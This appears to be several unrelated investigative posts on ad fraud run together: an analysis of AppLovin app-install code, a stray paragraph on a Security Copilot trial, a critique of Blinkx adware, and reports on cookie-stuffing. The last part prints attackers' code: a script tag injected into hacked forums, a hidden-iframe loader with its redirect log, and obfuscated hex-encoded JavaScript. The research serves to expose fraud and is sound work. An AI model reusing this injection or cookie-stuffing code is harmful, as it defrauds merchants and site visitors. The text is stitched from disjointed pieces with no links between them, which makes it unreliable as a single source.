Elsewhere in AppLovin code, there are hundreds of references to “Install”, “Installer”, “installing”, “startInstall”, and the like, including more precise labels such as “andr_app_installing_start”, “an.ui.ntfn.installing_progress.enabled”, and “package_installing_successfully_finished_notification_id”. AppLovin logging also includes status messages like “Failed to start install”, “Failed to start installing”. These labels and strings leave no doubt that AppLovin can install apps—but they do not prove that installations are silent, automatic, or nonconsensual. Other labels, like “DirectInstallOrDownload”, indicate a nonstandard installation (not via Google Play) and suggest the install has few steps (calling into question what disclosure is provided and what consent obtained), but again are less than complete proof.
Labels in JavaScript code
The AppHub APK embeds a resource file, index-BFfWBgBF.js, which contains labels indicating non-consensual “auto” installations. The file merits close examination (see my execution path analysis), but even its labels reveal its purpose. For example:
A JavaScript “Breadcrumb” message logger even records a possible event, “Installation on ‘X’ button click”. Yet clicking an X is ordinarily understood as rejection, not consent. Similarly, an error handler describes “Failed to set installation on dismiss enabled”—implying that, when working correctly, the code can indeed install on dismiss. But what user thinks “dismiss[ing]” an ad is basis for an installation? Code snippets below.
catch(a => {
pe.reportError(new Error("Failed to set installation on dismiss enabled", {
pe.leaveBreadcrumb({
message: 'Installation on "X" button click', ...
Taken together, these labels describe scenarios where installations proceed without a user being asked to install or without the user agreeing to install.
Possible settings screen entries consistent with automatic installations
The resource file index-BFfWBgBF.js also includes a potential settings screen with the following labels:
zu = "Enable Direct Download",
Gu = "Download apps with a single click", ...
Ra = { EnableDirectDownload: zu,
EnableDirectDownload_Description: Gu, ...
From the resource file alone, it is unclear whether this screen is ever presented to users, and if so, under what conditions or with what default setting. Yet users consistently report unexpected app installations, suggesting that the option may be enabled by default—or hidden in a screen users do not ordinarily open.
My personal experience reinforces doubt about such a screen being shown to users. In spring 2025, I purchased a new T-Mobile phone directly from the carrier. On first boot, the out-of-box setup prominently displayed AppLovin screens urging me to download apps. At no point did I see any option to “Enable Direct Download” or to “Download apps with a single click.”
User complaints confirm that no such screen is shown. In reviewing complaints, I found no screenshots of such a screen being proactively shown. One user noted:
I found an app called Content Manager on my Samsung S24 that I bought through T-Mobile. There was an option there that says “Allow Install of New Apps” and I turned it off, and the ad installs stopped. (Skybreak, April 6, 2024)
This complaint reinforces the problem: a user would have no reason to hunt through a Content Manager settings screen to disable unwanted installs. Nor does failing to disable a buried option constitute consent for arbitrary app installations.
A reliable way to understand what software does is to examine its source code and trace the execution path. This is rarely possible for compiled code, but AppLovin is largely Java, which can be decompiled using tools such as JADX. I reviewed decompiled source code alongside the full app manifests and relevant resource files embedded within APKs. Together, these materials reveal both what the apps are permitted to do (via permissions), how execution proceeds from function to function, and, ultimately, what occurs.
Let me remark on three key challenges in interpreting the decompiled code. First, length. After decompilation using JADX, the AppHub APK totals a remarkable 626,053 lines of code. Then there’s more in the AppLovin SDK, in install helpers, in manifests, and in JavaScript. Of course most of the code is irrelevant to app installs. In the excerpts linked below, I focus on what I found to be relevant. But the execution path remains lengthy even after excerpting.
Second, both decompilation and deliberate obfuscation by AppLovin make parts of the code difficult to read. Decompilation recovers some labels (function names and variable names), but others are lost and must be generated by JADX – yielding labels that are difficult to interpret (such as AbstractC1838d0) and not the labels actually used in AppLovin’s source code. Meanwhile, AppLovin intentionally obfuscated (minified) its JavaScript—not unexpected, because they have no reason to help anyone read it, but still an impediment to understanding.
Third, Android’s architecture—including coroutine continuation functions for multithreading—adds further complexity. This code is not the simple a() calls b() calls c() taught in introductory programming classes.
Nonetheless, with knowledge of Java syntax and Android architecture, and with determination and grit, the execution flow is apparent. I worked on understanding this code on-and-off from February to September 2025, and I now feel I have a good understanding. My remarks below are my best effort under important constraints, including both the size of the task and AppLovin’s intentional obfuscation. I cannot guarantee perfection. See my disclosures.
In the index below, I present code in the sequence in which it operates. Where a function name is less than self-explanatory, I remark on its purpose. In the linked pages, I introduce each block of code with a short narrative about key steps, and I use red text to mark the flow from one step to the next. Occasional comments, marked with the prefix // , are added by me to explain selected areas.
showDirectDownloadAppDetailsWithExtra() with service method AbstractC1838d0.m3826C(),delegate C2823r(), and Kotlin coroutine continuation with entry point mo410()
setupAppDetailsFragment() and coroutine continuation class C3359j1 with continuation entry point mo410r()
DirectDownloadMainFragment C3374l2 and onViewCreated mo1147B() with coroutines C3339g2, C3332f2, and C3325e2, plus coroutine continuation orchestrator M5734P and URL builder m5748L
AbstractC3404p4.mo1147B() with C3334f4 and C3320d4 (WebView loader)
DirectDownloadMainFragment continuation entry point mo410r()
My work follows six prior critiques in which others questioned AppLovin practices, both as to app installations and beyond. I organize those critiques here, in chronological order, to assist those who wish to reread them. I emphasize those reports and sections that, like my post today, consider nonconsensual installations.
Compared with prior reports, I provide a more detailed technical analysis. For example Solon’s report of SEC inquiry does not provide any source code, screenshots, packet logs, or other direct evidence of data collection violations. I also provide greater proof relative to prior reports of nonconsensual installations. For example, the prior reports about nonconsensual installs present snippets of code, whereas I trace the full execution chain from ad delivery all the way to installation. Similarly, prior reports offer a few complaints about nonconsensual installations, but I offer hundreds, plus I explore patterns of complaints across devices and situations, and I cross-check complaints against details in decompiled AppLovin code.
We conducted randomized controlled trials (RCTs) to measure the efficiency gains from using Security Copilot, including speed and quality improvements. External experimental subjects logged into a M365 Defender instance created for this experiment and performed four tasks: Incident Summarization, Script Analyzer, Incident Report, and Guided Response. We found that Security Copilot delivered large improvements on both speed and accuracy. Copilot brought improvements for both novices and security professionals.
Video and advertising conglomerate Blinkx tells investors its “strong performance” results from “strategic initiatives” and “expanding demand, content, and audiences.” Indeed, Blinkx recently climbed past a $1.2 billion valuation. At first glance, it sounds like a great business. But looking more carefully, I see reason for grave doubts.
My concerns result in large part from the longstanding practices of two of Blinkx’s key acquisitions, Zango and AdOn. But concerns extend even to Blinkx’s namesake video site. In the following sections, I address each in turn. Specifically, I show ex-Zango adware still sneaking onto users’ computers and still defrauding advertisers. I show the ex-AdOn traffic broker still sending invisible, popup, and other tainted traffic. I show Blinkx’ namesake site, Blinkx.com, leading users through a maze of low-content pages, while charging advertisers for video ads systematically not visible to users.
Few users would affirmatively request adware that shows extra pop-ups, so Blinkx and its distributors use deceptive tactics to sneak adware onto users’ computers. In a representative example, I ran a Google search for “Chrome” (Google’s well-known web browser), clicked an ad, and ended up at Youdownloaders.com — a site that bundles Chrome with third-party advertising software. (The Youdownloaders footer states “The installers are compliant with the original software manufacturer’s policies and terms & conditions” though it seems this claim is untrue: Chrome Terms of Service section 5.3 disallows copying and redistributing Chrome; 8.6 disallows use of Google’s trademarks in a way that is likely to cause confusion; 9.3 disallows transfer of rights in Chrome.) In my testing, the Youdownloaders installer presented offers for five different adware programs and other third-party applications, among them Weather Alerts from desktopweatheralerts.com. Installation video.
I consider the Youdownloaders installation deceptive for at least four reasons: 1) A user’s request for free Chrome software is not a proper circumstance to tout adware. The user gets absolutely nothing in exchange for supposed “agreement” to receive the adware; Chrome is easily and widely available for free, without adware. It is particularly one-sided to install five separate adware apps — taking advantage of users who do not understand what they are asked to accept (including kids, non-native speakers, and those in a hurry). 2) On the Weather Alerts page of the installation, on-screen statements mention nothing of pop-up ads or, indeed, any advertising at all. In contrast, the FTC’s settlement with Zango requires that disclosure of advertising practices be “clear and prominent,” “unavoidable,” and separate from any license agreement — requirements not satisfied here. 3) The Youdownloaders user interface leads users to think that the bundled installations are compulsory. For example, the “decline” button (which lets a user reject each adware app) appears without the distinctive shape, outline, color, or font of an ordinary Windows button. 4) Users are asked to accept an objectively unreasonable volume of agreements and contracts, which in my testing include at least 14 different documents totaling 37,564 words (8.5 times the length of the US Constitution).
Tellingly, Blinkx takes considerable steps to distance itself from these deceptive practices. For example, nothing on Blinkx’s site indicates that Weather Alerts is a Blinkx app or shows Blinkx ads. The Desktopweatheralerts.com site offers no name or address, even on its Contact Us form. Weather Alerts comes from a company called Local Weather LLC, an alter ego of Weather Notifications LLC, both of Minneapolis MN, with no stated affiliation with Blinkx. Weather Notifications’ listed address is a one-bedroom one-bathroom apartment — hardly a standard corporate office. Nonetheless, multiple factors indicate to me that Desktop Weather Alerts isdelivers a version of Zango adware. For one, Desktop Weather Alerts popups use the distinctive format long associated with Zango, including the distinctive browser buttons at top-left, as well as distinctive format of the advertisement label at bottom-left. Similarly, many sections of the license agreement and privacy policy are copied verbatim from longstanding Zango terms. Within the Weather Alerts EXE, strings reference 180search Assistant (a prior Zango product name) as well as 180client and various control systems long associated with Zango’s ad-targeting system. Similarly, when Weather Alerts delivers ads, its ad-delivery communications use a distinctive proprietary HTTP syntax both for request (to showme.aspx, with a HTTP POST parameter of epostdata= providing encoded ad context) and response (a series of HTML FORM elements, most importantly an INPUT NAME=ad_url to indicate the popup to open). I have seen this syntax (and its predecessors) in Zango apps for roughly a decade, but I have never seen this syntax used by any advertising delivered by other adware vendors or other companies. Moreover, when a Blinkx contractor previously contacted a security vendor to request whitelist treatment of its adware, the Blinkx representative said “The client is Blinkx … Your engine … was flagging their installer package SWA as SevereWeatherAlerts…” (emphasis added). Notice the Blinkx representative indicating that SWA (another Local Weather program, virtually identical save for domain name and product name) is “their” app, necessarily referring to Blinkx. Finally, in a February 2014 presentation, Blinkx CEO Brian Mukherjee included the distinctive Local Weather icon (present throughout the LW app and in LW’s installation solicitations) as part of the “Blinkx Ecosystem” — further confirming the link between LW and Blinkx. Taken together, these factors give good reason to conclude that Local Weather isapplications are powered by Blinkx and part of the Blinkx network. Furthermore, in my testing Blinkx is the sole source of advertising for Weather Alerts — meaning that Blinkx’s payments are Weather Alerts’ primary source of revenue and primary reason for existence. (Additions made February 13, 2014, shown in grey highlighting.)
Blinkx/Zango software continues to defraud affiliate merchants.
Meanwhile, Zango-delivered advertising remains a major cause of concern. Zango’s core advertising product remains the browser popup — a disruptive form of advertising unpopular with most users and also unpopular with most mainstream advertisers. Notably, Zango’s popups perpetrate various advertising fraud, most notably ‘lead stealing” affiliate windows that cover merchant sites with their own affiliate links. If the user purchases through either window, the Zango advertiser gets paid a commission — despite doing nothing to genuinely cause or encourage the user’s purchase. (Indeed, the popup interrupts the user and thereby somewhat discourages a purchase.) At right, I show a current example: In testing of January 19, 2014, Blinkx/Zango sees a user browsing Walmart, then opens a popup to Blinkx/LeadImpact (server lipixeltrack) which redirects to LinkShare affiliate ORsWWZomRM8 and on to Walmart. Packet log proof. Thus, Walmart ends up having to pay an affiliate commission on traffic it already had — a breach of Walmart’s affiliate rules and broadly the same as the practice for which two eBay affiliates last year pled guilty. I’ve reported Zango software used for this same scheme since June 2004. As shown at right and in other recent examples, Zango remains distinctively useful to rogue affiliates perpetrating these schemes. These rogue affiliates pay Blinkx to show the popups that set the scheme in motion — and I see no sign that Blinkx has done anything to block this practice.
Rather than put a stop to these practices, Blinkx largely attempts to distance itself from Zango’s legacy business. For one, Blinkx is less than forthright as to what exactly it purchased. In Blinkx’s 2010 financial report, the first formal investor statement to discuss the acquisition, Blinkx never uses the word “Zango” or otherwise indicates the specific company or assets that Blinkx acquired. Rather, Blinkx describes the purchase as “certain net assets from a consortium of financial institutions to facilitate the growth of the video search and advertising businesses.” If a reader didn’t already know what Blinkx had bought, this vague statement would do nothing to assist.
Even when Blinkx discusses the Zango acquisition, it is less than forthcoming. UK news publication The Register quotes an unnamed Blinkx spokeswoman saying that Blinkx “purchased some technical assets from the bank [that foreclosed on Zango] including some IP and hardware, which constituted about 10 per cent of Zango’s total assets.” Here too, readers are left to wonder what assets are actually at issue. A natural interpretation of the quote is that Blinkx purchased trademarks, domain names, or patents plus general-purpose servers — all consistent with shutting the controversial Zango business. But in fact my testing reveals the opposite: Blinkx continues to run key aspects of Zango’s business: legacy Zango installations continue to function as usual and continue to show ads, and Blinkx continues to solicit new installations via the same methods, programs, and partners that Zango previously used. Furthermore, key Zango staff joined Blinkx, facilitating the continuation of the Zango business. Consider Val Sanford, previously a Vice President at Zango; her LinkedIn profile confirms that she stayed with Blinkx for three years after the acquisition. I struggle to reconcile these observations with the claim that Blinkx only purchased 10% of Zango or that the purchase was limited to “IP and hardware.” Furthermore, ex-Zango CTO Ken Smith contemporaneously disputed the 10% claim, insisting that “Blinkx acquired fully 100% of Zango’s assets.”
Blinkx has been equally circumspect as to the size of the ex-Zango business. In Blinkx’ 2010 financial report, Blinkx nowhere tells investors the revenue or profit resulting from Zango’s business. Rather, Blinkx insists “It is not practical to determine the financial effect of the purchased net assets…. The Group’s core products and those purchased have been integrated and the operations merged such that it is not practical to determine the portion of the result that specifically relates to these assets.” I find this statement puzzling. The ex-Zango business is logically freestanding — for example, separate relationships with the partners who install the adware on users’ computers. I see no proper reason why the results of the ex-Zango business could not be reported separately. Investors might reasonably want to know how much of Blinkx’s business comes from the controversial ex-Zango activities.
Indeed, Blinkx’s investor statements make no mention whatsoever of Zango, adware, pop-ups, or browser plug-ins of any kind in any annual reports, presentations, or other public disclosures. (I downloaded all such documents from Blinkx’ Financial Results page and ran full-text search, finding no matches.) As best I can tell, Blinkx also failed to mention these endeavors in conference calls or other official public communications. In a December 2013 conference call, Jefferies analyst David Reynolds asked Blinkx about its top sources of traffic/supply, and management refused to answer — in sharp contrast to other firms that disclose their largest and most significant relationships.
In March-April 2012, many ex-Zango staff left Blinkx en masse. Many ended up at Verti Technology Group, a company specializing in adware distribution. Myriad factors indicate that Blinkx controls Verti: 1) According to LinkedIn, Verti has eight current employees of which five are former employees of Zango, Pinball, and/or Blinkx. Other recent Verti employees include Val Sanford, who moved from Zango to Blinkx to Verti. 2) Blinkx’s Twitter account: Blinkx follows just nineteen users including Blinkx’s founder, various of its acquisitions (including Prime Visibility / AdOn and Rhythm New Media), and several of their staff. Blinkx follows Verti’s primary account as well as the personal account of a Verti manager. 3) Washington Secretaty of State filings indicate that Verti’s president is Colm Doyle (then Directory of Technology at Blinkx, though he subsequently returned to HP Autonomy) and secretary, treasurer, and chairman is Erin Laye (Director of Project Management at Blinkx). Doyle and Laye’s links to Blinkx were suppressed somewhat in that both, at formation, specified their home addresses instead of their Blinkx office. 4) Whois links several Verti domains to Blinkx nameservers. (Details on file.) Taken together, these facts suggest that Blinkx attempted to move a controversial business line to a subsidiary which the public is less likely to recognize as part of Blinkx.
The Legacy AdOn Business
In November 2011, Blinkx acquired Prime Visibility Media Group, best known for the business previously known as AdOn Network and MyGeek. I have critiqued AdOn’s traffic repeatedly: AdOn first caught my eye when it boasted of relationships with 180solutions/Zango and Direct Revenue. New York Attorney General litigation documents later revealed that AdOn distributed more than 130,000 copies of notorious Direct Revenue spyware. I later repeatedly reported AdOn facilitating affiliate fraud, inflating sites’ traffic stats, showing unrequested sexually-explicit images, and intermediating traffic that led to Google click fraud.
Similar problems continue. For example, in a February 2013 report for a client, I found a botnet sending click fraud traffic through AdOn’s ad-feeds.com server en route to advertisers. In an August 2013 report for a different client, I found invisible IFRAMEs sending traffic to AdOn’s bing-usa.com and xmladfeed.com servers, again en route to advertisers. Note also the deceptive use of Microsoft’s Bing trademark — falsely suggesting that this tainted traffic is in some way authorized by or affiliated with Bing, when in fact the traffic comes from AdOn’s partners. Moreover, the traffic was entirely random and untargeted — keywords suggested literally at random, entirely unrelated to any aspect of user interests. In other instances, I found AdOn receiving traffic directly from Zango adware. All told, I reported 20+ distinct sequences of tainted AdOn traffic to clients during 2013. AdOn’s low-quality traffic is ongoing: Advertisers buying from AdOn receive invisible traffic, adware/malware-originating traffic, and other tainted traffic that sophisticated advertisers do not want.
An AdOn staff member touts multiple incriminating characteristics of AdOn traffic.
Industry sources confirm my concern. For example, a June 2013 Ad Week article quotes one publisher calling AdOn “just about the worst” at providing low-quality traffic, while another flags “crazy traffic patterns.” In subsequent finger-pointing as to tainted traffic to OneScreen sites, OneScreen blamed a partner, Touchstorm, for working with AdOn — wasting no words to explain why buying from AdOn is undesirable. Even intentional AdOn customers report disappointing quality: In comments on a posting by Gauher Chaudhry, AdOn advertisers call AdOn “the reason I stopped doing any PPV [pay-per-view] … this is bot traffic”, “junk”, and “really smell[s] like fake traffic.” Of 31 comments in this thread, not one praised AdOn traffic quality.
Recent statements from AdOn employees confirm undesirable characteristics of AdOn traffic. Matthew Papke’s LinkedIn page lists him as Director of Contextual Ads at AdOn. But his page previously described AdOn’s offering as “pop traffic” — admitting undesirable non-user-requested pop-up inventory. His page called the traffic “install based” — indicating that the traffic comes not from genuine web pages, but from adware installed on users’ computers. See screenshot at right. All of these statements have been removed from the current version of Matthew’s page.
Problems at Blinkx.com: Low-Quality Traffic, Low-Quality Content, and Invisible Ads
Alexa reports a sharp jump in Blinkx traffic in late 2013.
Zango adware caused my computer to display this page from the Blinkx site, full-screen and without standard window controls.
Blinkx’s namesake service is the video site Blinkx.com. Historically, this site has been a bit of an also-ran — it’s certainly no YouTube! But Alexa reports a striking jump in Blinkx popularity as of late 2013: Blinkx’s traffic jumped from rank of roughly 15,000 worldwide to, at peak, rank of approximately 3,000. What could explain such a sudden jump?
In my automated and manual testing of Zango adware, I’ve recently begun to see Zango forcing users to visit the Blinkx site. The screenshot at right gives an example. My test computer displayed Blinkx full-screen, without title bar, address bar, or standard window buttons to close or minimize. See also a partial packet log, wherein the Blinkx site attributes this traffic to Mossysky (“domain=mossysky”), one of the Zango brand names. It’s a strikingly intrusive display — no wonder users are complaining, about their computers being unusable due to Blinkx’s unwanted intrusion. See e.g. a December 2013 Mozilla forum post reporting “my computer has been taken over by malware, half the links are inaccessible because of hovering links to Blinkx,” and a critique and screenshot showing an example of these hovering links. On a Microsoft support forum, one user reports Internet Explorer automatically “opening … numerous BLINKX websites” — as many as “20 websites open at one time, all Blinkx related.”
Moreover, Alexa’s analysis of Blinkx visitor origins confirms the anomalies in this traffic. Of the top ten sites sending traffic to Blinkx, according to Alexa, six are Blinkx servers, largely used to forward and redirect traffic (networksad.com, advertisermarkets.com, networksads.com, advertiserdigital.com, blinkxcore.com, and networksmarkets.com). See Alexa’s Site Info for Blinkx.com at heading “Where do Blinkx.com’s visitors come from?”
Strikingly, Zango began sending traffic to Blinkx during the winter 2013 holiday season — a time of year when ad prices are unusually high. Zango’s popups of Blinkx seem to have ended as suddenly as they began — consistent with Blinkx wanting extra traffic and ad revenue when ad prices are high, but concluding that continuing this practice at length risks excessive scrutiny from both consumers and advertisers.
Meanwhile, examining Blinkx.com, I’m struck by the lack of useful content. I used the Google search site:blinkx.com to find the parts of the Blinkx site that, according to Google, are most popular. I was directed to tv.blinkx.com, where the page title says users can “Watch full episodes of TV shows online.” I clicked “60 Minutes” and received a page correctly profiling the excellence of that show (“the granddaddy of news magazines”). But when I clicked to watch one of the listed episodes, I found nothing of the kind: Requesting “The Death and Life of Asheboro, Stealing History, The Face of the Franchise,” I was told to “click here to watch on cbs.com” — but the link actually took me to a 1:33 minute home video of a dog lying on the floor, “Husky Says No to Kennel”, syndicated from YouTube, entirely unrelated to the top-quality 60 Minutes content I had requested. (Screen-capture video.) It was a poor experience — not the kind of content likely to cause users to favor Blinkx’s service. I tried several other shows supposedly available — The Colbert Report, The Daily Show with Jon Stewart, Family Guy, and more — and never received any of the listed content.
In parallel, the Blinkx site simultaneously perpetrated a remarkable scheme against advertisers: On the video index page for each TV show, video advertising was triggered to play as I exited each page by clicking to view the supposed video content. Because the supposed content opened in a new tab, the prior tab remained active and could still host a video player with advertising. Of course the prior tab was necessarily out of visibility: Blinkx’s code had just commanded the opening of a new tab showing the new destination. But the video still played, and video advertisers were still billed. Screen-capture video.
Industry sources confirm concerns about Blinkx ad visibility. For example, a December 15, 2013 Ad Week piece reported Vindico analysis finding just 23% of Blinkx videos viewable (defined as just 50% of pixels visible for just one second). By Vindico’s analysis, an advertiser buying video ads from Blinkx suffers three ads entirely invisible for every ad visible even by that low standard — a remarkably poor rate of visibility. In contrast, mainstream video sites like CBS and MSN enjoyed viewability rates two to four times higher.
Putting the Pieces Together
Q3 ’13 Headcount
’13 Revenue ($mm)
revenue / headcount ($k)
Tremor
287
$148
$517
YuMe
357*
$157
$440
RocketFuel
552
$240
$434
Criteo
452
$240
$532
Blinkx
265**
$246***
$927
* Q3 ’13 headcount not available. 357 is 2012 year-end. S&M spend up ~50% in 2013. Adjusted revenue/headcount is $293k
** Q3 ’13 headcount not available. 265 is 2012 year-end. S&M spend up ~15% in 2013. Adjusted revenue/headcount is $803k.
*** 2013 revenue estimate based on Bloomberg consensus estimates
Comparing Blinkx’s revenues to competitors, I am struck by Blinkx’s apparent outsized success. See the table at right, finding Blinkx producing roughly twice as much revenue per employee as online video/display ad networks and advertising technology companies which have recently made public offerings. Looking at Blinkx’s sites and services, one doesn’t get the sense that Blinkx’s service is twice as good, or its employees twice as productive, as the other companies listed. So why does Blinkx earn twice as much revenue per employee? One natural hypothesis is that Blinkx is in a significantly different business. While other services make significant payments to publishers for use of their video content, my browsing of Blinkx.com revealed no distinctive content obviously licensed from high-quality high-cost publishers. I would not be surprised to see outsized short-term profits in adware, forced-visit traffic, and other black-hat practices of the sort used by some of the companies Blinkx has acquired. But neither are these practices likely to be sustainable in the long run.
Reviewing Blinkx’s statements to investors, I was struck by the opacity. How exactly does Blinkx make money? How much comes from the legacy Zango and AdOn businesses that consumers and advertisers pointedly disfavor? Why are so many of Blinkx’s metrics out of line with competitors? The investor statements raise many questions but offer few answers. I submit that Blinkx is carefully withholding this information because the company has much to hide. If I traded in the companies I write about (I don’t!), I’d be short Blinkx.
This article draws in part on research I prepared for a client that sought to know more about Blinkx’s historic and current practices. At my request, the client agreed to let me include portions of that research in this publicly-available posting. My work for that client yielded a portion of the research presented in this article, though I also conducted significant additional research and drew on prior work dating back to 2004. My agreement with the client did not oblige me to circulate my findings as an article or in any other way; to my knowledge, the client’s primary interest was in learning more about Blinkx ‘s business, not in assuring that I tell others. By agreement with the client, I am not permitted to reveal its name, but I can indicate that the client is two US investment firms and that I performed the research during December 2013 to January 2014. The client tells me that it did not change its position on Blinkx after reading my article. (Disclosure updated and expanded on February 4-5, 2014.)
I thank Eric Howes, Principal Lab Researcher at ThreatTrack Security, and Matthew Mesa, Threat Researcher at ThreatTrack Security, for insight on current Blinkx installations.
Last month we presented an example cookie-stuffer using encoded JavaScript to drop scores of cookies invisibly. But how can such a cookie-stuffer get traffic to its site? Today’s example is particularly nefarious: Perpetrators using server bannertracker-script.com have hacked at least 29 different online discussion forums to add invisible code that lets them cookie-stuff forum visitors. Through this approach, perpetrators have gained access to a particularly large amount of traffic — letting them target all the more users.
Getting Traffic to Bannertracker-script
The perpetrators appear to be targeting a documented exploit in vBulletin (a popular forum discussion program built in PHP/MySQL) versions v4.x to v4.1.2. The exploit allows for a remote attacker to execute arbitrary PHP script as well as untrusted SQL queries. It was first reported in German in April 2011, then in English in January 2012. A video tutorial even offers step-by-step instructions on how to use this exploit.
Our automation systems have examined more than 500,000 sites, searching for code promoting the cookie-stuffers we are following. We have found numerous affected sites, including sites as popular as searchenginewatch.com (Alexa traffic rank #2045), webdeveloper.com (#2822) and redflagdeals.com (#3188) along with many more. Selected pages of these sites (typically the forum pages) embed hostile code from Bannertracker-script.
In each instance, the hostile code appears as a brief JavaScript addition to an otherwise-legitimate site. See the single line of inserted code highlighted in yellow below. Notably, the hostile code appears within a block of code embedding comScore tags (green highlighting below) — a place where site designers expect to see external JavaScript references, making the Bannertracker-script insertion that much less likely to be detected.
<!– Begin comScore Tag –>
<script type=”text/javascript” src=”http://www.bannertracker-script.com/banner/ads.php?a=big”></script> <script type=”text/javascript”>document.write(“<img id=’img1′ height=’1′ width=’1′>”);
document.getElementById(“img1”).src=”http://beacon.scorecardresearch.com/scripts/beacon.dll? C1=2&C2=5915554&C3=5915554&C4=www.redflagdeals.com &C5=&C6=&C7=” + escape(window.location.href) + “&C8=” + escape(document.title) + “&C9=” + escape(document.referrer) + “&rn=” + Math.floor(Math.random()*99999999);</script><!– End comScore Tag –>
Examining Bannertracker-script insertions on other sites, we found them in other inconspicuous places — for example, just before the </HTML> tag that ends a page.
Cookie-Stuffing by Bannertracker-script
As a result of the hack-based code insertion shown above, a user visiting any affected site receives Bannertracker-script code also. That code creates an invisible IFRAME which loads the Amazon site via an affiliate link. Here’s how: First, the code creates a doubly-invisible DIV (CSS style of display:hidden and visibility:none, shown in blue highlighting below). The code then creates an invisible IFRAME within that DIV (CSS display:none, visibility:hidden, size of 0x0 pixels, shown in purple highlighting below). The code instructs that the DIV load a URL on Http-uptime.com (grey) which redirects through to an Amazon Associates affiliate link with affiliate ID camerlucidpho-20 (red). See also the full packet log.
GET /banner/ads.php?a=big HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.bannertracker-script.com
HTTP/1.1 200 OK …
GPad = {
init: function () {
document.write(‘<div id=”GPAD” style=”visibility:hidden; display:none;”></div>’);
var frame = document.createElement(‘iframe’);
frame.setAttribute(‘src’, ‘http://www.http-uptime.com/banner/index.php‘);
frame.setAttribute(‘style’, ‘display:none; width: 0px; height 0px; border: none; visibility:hidden‘);
frame.style.visibility = ‘hidden’;
frame.style.display = ‘none’;
var div = document.getElementById(‘GPAD’);
div.appendChild(frame);
}
}
GPad.init();
—
GET /index.php HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.http-uptime.com
HTTP/1.1 200 OK …
<html><head><meta http-equiv=”refresh” content=”0;url=http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932″ />
</head></html>
—
GET /icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932 HTTP/1.1 …
Host: www.http-uptime.com …
HTTP/1.1 302 Moved Temporarily …
Location: http://www.amazon.com/gp/search?ie=UTF8&keywords=&tag=camerlucidpho-20&index=pc-hardware&linkCode=ur2&camp=1789&creative=932
The net effect is to load Amazon’s site invisibly. Amazon operates using a 24-hour referral period, so if a user happened to make a purchase from Amazon within the next 24 hours, Amazon would credit this affiliate as the putative referer of the traffic — paying this affiliate a commission of at least 4% and as much as 15%.
Concealment by Bannertracker-script
The preceding discussion noted two mechanisms by which Bannertracker-script attempted to conceal its actions. First, it placed its tags within the comScore section of affected sites, where unfamiliar code is less likely to attract suspicion. Second, it loaded its tags invisibly, including via the multiple nested invisible elements detailed above. Still, by sending so much to Amazon, Bannertracker-script clearly recognized that it risked attracting scrutiny from Amazon, which might question how one affiliate obtained so much traffic. Bannertracker-script therefore turned to multiple Amazon Associates ID’s. In our testing, we found more than 200 such IDs of which we report 20 below:
abacemedi-20
aledesoftw-20
anybr-20
arizonosteopc-20
actkid-20
allesbluefree-20
apa0c5-20
artofdri-20
adirooutdocom-20
alsjopa-20
apitherapy03-20
astba-20
afrkilbeemov-20
amergumbmachc-20
apitroservic-20
atlcitgam-20
ajelcand-20
ancestorville-20
arasmazi-20
babblu-20
Using multiple IDs raises a further risk for Bannertracker-script: A diligent investigator might request the Bannertracker-script site repeatedly in order to attempt to learn most or all of Bannertracker-script’s IDs. Bannertracker-script attempted to reduce this risk via server-side logic to avoid serving the same user with two different ID’s, based on variables that seem to include client IP address, HTTP User-agent header, and more.
In principle, investigators might recognize Bannertracker-script by its distinctive domain name. But in fact we have seen this perpetrator also using other domain names. (We refer to the perpetrator as Bannertracker-script because that was the first such domain we found and, in our testing, still the most frequent.)
Affected Merchants
To date, we have primarily seen Bannertracker-script targeting Amazon. But other merchants are vulnerable to similar attacks that drop a large number of cookies invisibly in hopes that users make purchases from the corresponding merchants. In this regard, large merchants are particularly vulnerable: The more popular a merchant is, the greater the likelihood of a given user making a purchase from that merchant in a given time period. Indeed, we have also seen Bannertracker-script using the same technique to drop cookies for several adult web sites
Amazon’s exposure is somewhat reduced by its 24-hour affiliate commission window — paying commission to affiliates only on a user’s purchases within 24 hours of invocation of an affiliate link, whereas other merchants often grant credit for as long as 30 days. But Amazon’s large and growing popularity limits the effectiveness of this measure. Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. If Bannertracker-script can deposit one million Amazon cookies, via hacks of multiple popular sites, it will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents — substantial revenue, particularly given the prospect of hacking other vulnerable web sites. Ordinarily, one might expect Amazon to notice a new affiliate with a large spike in earnings. But by spreading its commissions across hundreds of affiliate accounts, Bannertracker-script may avoid or deflect such scrutiny.
We have reported this matter to our contacts at Amazon and will update this post with any information Amazon cares to share.
We have recently been testing web sites that drop affiliate cookies invisibly — claiming to have referred users to the corresponding merchants’ sites, when in fact users never asked to visit the merchants’ sites and never saw the merchants’ sites. Nonetheless, through invisible IFRAMEs, invisible IMG tags, and similar constructs, these pages manage to set affiliate cookies indicating that referrals occurred. Then, if users happen to make purchases from the targeted merchants, the cookie-stuffers collect affiliate commissions. With commissions as large as 40%, this tactic can be lucrative.
One large offender we recently found: Eshop600.co.uk. In automated and manual testing, we found 36 pages on the Eshop600 site, including the site’s home page, which drop dozens of cookies invisibly. To a user glancing at a web browser, the Eshop600 site looks perfectly normal:
But within the affected Eshop600 pages are 26 blocks of encoded JavaScript code. An example:
var i,y,x="3c696d672069643d22706963333722207372633d22....";y="";var _0x70c3=["x6Cx65x6Ex67x74x68","x25","x73x75x62x73x74x72","x77x72x69x74x65"];for(i=0;i<x[_0x70c3[0]];i+=2){ y+=unescape(_0x70c3[1]+x[_0x70c3[2]](i,2));} ;document[_0x70c3[3]](y);
We decoded this JavaScript to find an invisible IMG tag.
